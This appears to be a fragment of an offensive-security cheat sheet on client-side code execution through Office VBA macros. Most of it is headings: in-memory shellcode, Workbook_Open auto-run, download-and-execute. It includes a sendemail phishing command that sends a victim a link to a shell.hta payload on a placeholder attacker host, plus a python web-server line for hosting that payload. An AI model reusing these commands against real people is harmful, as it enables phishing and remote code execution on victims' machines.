Client Side Code Execution
VBA Macro in MS Office
Send email
sendemail -f [email protected] -t [email protected] -s victim.ip -u "Subject" -m "Help: http://hacker.ip/shell.hta"Run from Web Server through Powershell In-Memory
python -m http.server 80
In-Memory Shellcode VBA Macro without .exe
.exe/x64/ shellcode with Dim res As LongPtr for x64 modern MS Office
Workbook_Open() for Excel
VBA .exe Shellcode Download & Execute on Disk
.exe Shellcode Download & Execute on DiskLast updated
